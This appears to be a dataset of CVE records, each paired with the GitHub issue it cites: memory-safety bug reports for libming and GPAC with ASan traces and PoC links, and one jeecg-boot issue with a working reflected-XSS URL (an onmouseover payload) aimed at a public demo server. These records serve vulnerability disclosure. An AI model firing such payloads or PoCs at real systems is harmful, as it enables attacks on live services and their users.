Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile380.zip](https://github.com/libming/libming/files/5118100/seg-decompile380.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==187067==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000041d8dc bp 0x0fffd003f178 sp 0x7ffe801f8bb0 T0) #0 0x41d8db in getString ../../util/decompile.c:380 #1 0x424764 in decompilePUSHPARAM ../../util/decompile.c:878 #2 0x42d225 in decompileSTARTDRAG ../../util/decompile.c:3054 #3 0x42d225 in decompileAction ../../util/decompile.c:3433 #4 0x44e234 in decompileActions ../../util/decompile.c:3535 #5 0x44e234 in decompile5Action ../../util/decompile.c:3558 #6 0x4114d9 in outputSWF_INITACTION ../../util/outputscript.c:1860 #7 0x402836 in readMovie ../../util/main.c:281 #8 0x402836 in main ../../util/main.c:354 #9 0x7fe9f9c4482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../util/decompile.c:380 getString ==187067==ABORTING ~~~~ The cause is due to the uncheck index of act->p.Constant8 mentioned in Figure. <img width="1037" alt="image" src="https://user-images.githubusercontent.com/7632714/91050602-79e4d200-e651-11ea-99fa-91d3604cea1d.png">
Segmentation fault in function getString, decompile.c:380
https://api.github.com/repos/libming/libming/issues/202/comments
1
2020-08-24T13:33:55Z
2020-08-24T14:49:29Z
https://github.com/libming/libming/issues/202
684,675,767
202
CVE-2021-34340
2022-03-10T17:42:37.657
Ming 0.4.8 has an out-of-bounds buffer access issue in the function decompileINCR_DECR() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969612" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/203" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/203
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile1640.zip](https://github.com/libming/libming/files/5123144/seg-decompile1640.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==79767==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000042782c bp 0x0000000000f0 sp 0x7ffdbd64ccf0 T0) #0 0x42782b in decompileINCR_DECR ../../util/decompile.c:1640 #1 0x44e234 in decompileActions ../../util/decompile.c:3535 #2 0x44e234 in decompile5Action ../../util/decompile.c:3558 #3 0x4114d9 in outputSWF_INITACTION ../../util/outputscript.c:1860 #4 0x402836 in readMovie ../../util/main.c:281 #5 0x402836 in main ../../util/main.c:354 #6 0x7fd557eb582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../util/decompile.c:1640 decompileINCR_DECR ==79767==ABORTING ~~~~ The cause might due to the incomplete check related to the index for array regs. <img width="1122" alt="image" src="https://user-images.githubusercontent.com/7632714/91164248-59745080-e701-11ea-8158-6cdf378decd9.png">
Segmentation fault in function decompileINCR_DECR, decompile.c 1640
https://api.github.com/repos/libming/libming/issues/203/comments
0
2020-08-25T10:33:55Z
2020-08-25T10:33:55Z
https://github.com/libming/libming/issues/203
685,372,287
203
CVE-2021-34341
2022-03-10T17:42:37.920
Ming 0.4.8 has an out-of-bounds read vulnerability in the function decompileIF() in the decompile.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969628" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/204" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/204
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler2516.zip](https://github.com/libming/libming/files/5123238/overflow-decompiler2516.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==165852==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dc88 at pc 0x00000044d878 bp 0x7ffd6043c430 sp 0x7ffd6043c420 READ of size 8 at 0x60e00000dc88 thread T0 #0 0x44d877 in decompileIF ../../util/decompile.c:2516 #1 0x442c5c in decompileActions ../../util/decompile.c:3535 #2 0x442c5c in decompileIF ../../util/decompile.c:2407 #3 0x43d3d4 in decompileActions ../../util/decompile.c:3535 #4 0x43d3d4 in decompileSETTARGET ../../util/decompile.c:3211 #5 0x43c38b in decompileActions ../../util/decompile.c:3535 #6 0x432866 in decompileTRY ../../util/decompile.c:2785 #7 0x432866 in decompileAction ../../util/decompile.c:3518 #8 0x44e234 in decompileActions ../../util/decompile.c:3535 #9 0x44e234 in decompile5Action ../../util/decompile.c:3558 #10 0x411304 in outputSWF_DOACTION ../../util/outputscript.c:1551 #11 0x402836 in readMovie ../../util/main.c:281 #12 0x402836 in main ../../util/main.c:354 #13 0x7f8b968e382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) 0x60e00000dc88 is located 8 bytes to the right of 160-byte region [0x60e00000dbe0,0x60e00000dc80) allocated by thread T0 here: #0 0x7f8b972487fa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987fa) #1 0x45e4cc in parseSWF_ACTIONRECORD ../../util/parser.c:1062 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../util/decompile.c:2516 decompileIF Shadow bytes around the buggy address: 0x0c1c7fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9b60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9b70: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff9b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1c7fff9b90: fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1c7fff9bb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff9bc0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c1c7fff9bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff9be0: 00 00 00 00 fa fa fa fa fa fa fa fa fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==165852==ABORTING ~~~~
Buffer overflow in decompileIF, decompile.c:2516
https://api.github.com/repos/libming/libming/issues/204/comments
0
2020-08-25T10:45:49Z
2020-08-25T10:45:49Z
https://github.com/libming/libming/issues/204
685,379,611
204
CVE-2021-34342
2022-03-10T17:42:38.207
Ming 0.4.8 has an out-of-bounds read vulnerability in the function newVar_N() in decompile.c which causes a huge information leak.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969619" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/205" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52 which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler751.zip](https://github.com/libming/libming/files/5123287/overflow-decompiler751.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==8303==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000026680 at pc 0x7f2f1360124b bp 0x7ffcf9987390 sp 0x7ffcf9986b38 READ of size 1025 at 0x619000026680 thread T0 #0 0x7f2f1360124a in strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7024a) #1 0x425b98 in newVar_N ../../util/decompile.c:751 #2 0x435db7 in decompileNEWOBJECT ../../util/decompile.c:1720 #3 0x435db7 in decompileAction ../../util/decompile.c:3324 #4 0x43d3d4 in decompileActions ../../util/decompile.c:3535 #5 0x43d3d4 in decompileSETTARGET ../../util/decompile.c:3211 #6 0x43c38b in decompileActions ../../util/decompile.c:3535 #7 0x432866 in decompileTRY ../../util/decompile.c:2785 #8 0x432866 in decompileAction ../../util/decompile.c:3518 #9 0x44e234 in decompileActions ../../util/decompile.c:3535 #10 0x44e234 in decompile5Action ../../util/decompile.c:3558 #11 0x411304 in outputSWF_DOACTION ../../util/outputscript.c:1551 #12 0x402836 in readMovie ../../util/main.c:281 #13 0x402836 in main ../../util/main.c:354 #14 0x7f2f12cc482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #15 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) 0x619000026680 is located 0 bytes to the right of 1024-byte region [0x619000026280,0x619000026680) allocated by thread T0 here: #0 0x7f2f136299c1 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989c1) #1 0x425b7b in newVar_N ../../util/decompile.c:754 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strlen Shadow bytes around the buggy address: 0x0c327fffcc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffcc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffcca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffccb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffccc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fffccd0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fffcce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fffccf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c327fffcd00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c327fffcd10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c327fffcd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==8303==ABORTING ~~~~
Buffer overflow in newVar_N, decompile.c:751
https://api.github.com/repos/libming/libming/issues/205/comments
0
2020-08-25T10:55:36Z
2020-08-25T10:55:36Z
https://github.com/libming/libming/issues/205
685,385,426
205
CVE-2021-44585
2022-03-10T21:15:14.397
A Cross Site Scripting (XSS) vulnerabilitiy exits in jeecg-boot 3.0 in /jeecg-boot/jmreport/view with a mouseover event.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "45720048-60C0-4FA8-AA09-16C8CF329FD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jeecgboot/jeecg-boot/issues/3223
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.0 ##### 问题描述: http://boot.jeecg.com:8080/jeecg-boot/jmreport/view/')%22onmouseover=alert('hacking')%20%20( ##### 截图&代码: ![image](https://user-images.githubusercontent.com/63626545/144021468-eedd94b9-694a-435d-8588-a747f3410ab2.png)
反射型XSS漏洞
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3223/comments
4
2021-11-30T09:33:40Z
2022-03-14T01:15:49Z
https://github.com/jeecgboot/JeecgBoot/issues/3223
1,067,002,316
3,223
CVE-2022-26967
2022-03-12T22:15:08.757
GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2138" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "22E296B6-C912-468A-8A88-EC33272D81FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2138
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ***Describe the bug*** There is a heap-buffer-overflow bug, which can be triggered via MP4Box+ ASan ***To Reproduce*** Steps to reproduce the behavior: ``` ./configure --cc=clang --cxx=clang++ --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -diso POC ``` Output: ``` [iso file] Box "moof" (start 0) has 3 extra bytes [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "moof" (start 23) has 3 extra bytes [iso file] Box "moof" (start 34) has 3 extra bytes [iso file] Box "moof" (start 77) has 3 extra bytes [iso file] Box "tref" (start 45) has 4 extra bytes [iso file] Unknown top-level box type 0005hEB ================================================================= ==1787100==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001012 at pc 0x0000005b4fdc bp 0x7ffde5e08a70 sp 0x7ffde5e08a68 WRITE of size 1 at 0x602000001012 thread T0 #0 0x5b4fdb in gf_base64_encode /home/hzheng/workspace/benchmarks/reproduce/gpac/src/utils/base_encoding.c:48:13 #1 0x8fdb6b in colr_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:5493:15 #2 0x90c095 in gf_isom_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_funcs.c:2076:2 #3 0x8cf29c in gf_isom_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:135:3 #4 0x539be2 in dump_isom_xml /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/filedump.c:1954:6 #5 0x51939b in mp4boxMain /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/main.c:6155:7 #6 0x7faccbbfc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x41fdad in _start (/home/hzheng/workspace/benchmarks/reproduce/gpac/bin/gcc/MP4Box+0x41fdad) 0x602000001012 is located 0 bytes to the right of 2-byte region [0x602000001010,0x602000001012) allocated by thread T0 here: #0 0x4c58ff in malloc /home/hzheng/env/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3 #1 0x8fdb37 in gf_malloc /home/hzheng/workspace/benchmarks/reproduce/gpac/src/utils/alloc.c:150:9 #2 0x8fdb37 in colr_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:5492:20 #3 0x90c095 in gf_isom_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_funcs.c:2076:2 #4 0x8cf29c in gf_isom_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:135:3 #5 0x539be2 in dump_isom_xml /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/filedump.c:1954:6 #6 0x51939b in mp4boxMain /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/main.c:6155:7 #7 0x7faccbbfc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hzheng/workspace/benchmarks/reproduce/gpac/src/utils/base_encoding.c:48:13 in gf_base64_encode Shadow bytes around the buggy address: 0x0c047fff81b0: fa fa 07 fa fa fa fd fa fa fa 04 fa fa fa 00 02 0x0c047fff81c0: fa fa fd fa fa fa 00 07 fa fa 00 00 fa fa 00 00 0x0c047fff81d0: fa fa 00 fa fa fa fd fa fa fa 00 04 fa fa 00 00 0x0c047fff81e0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00 0x0c047fff81f0: fa fa 04 fa fa fa 00 00 fa fa 04 fa fa fa 01 fa =>0x0c047fff8200: fa fa[02]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1787100==ABORTING ``` ***Environment*** gpac commit 54e9ed807fd24d83aa051fb097466d8760225401 clang release/12.x ubuntu 20.04 ***POC*** [POC.zip](https://github.com/gpac/gpac/files/8222176/POC.zip) ***Credit*** Han Zheng [NCNIPC of China](http://www.nipc.org.cn) [Hexhive](http://hexhive.epfl.ch/)
[BUG] heap-buffer-overflow in gf_base64_encode
https://api.github.com/repos/gpac/gpac/issues/2138/comments
3
2022-03-10T09:47:43Z
2022-08-03T09:44:25Z
https://github.com/gpac/gpac/issues/2138
1,164,990,736
2,138
CVE-2022-24575
2022-03-14T14:15:07.830
GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2058" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/1d9bf402-f756-4583-9a1d-436722609c1e/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2058
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
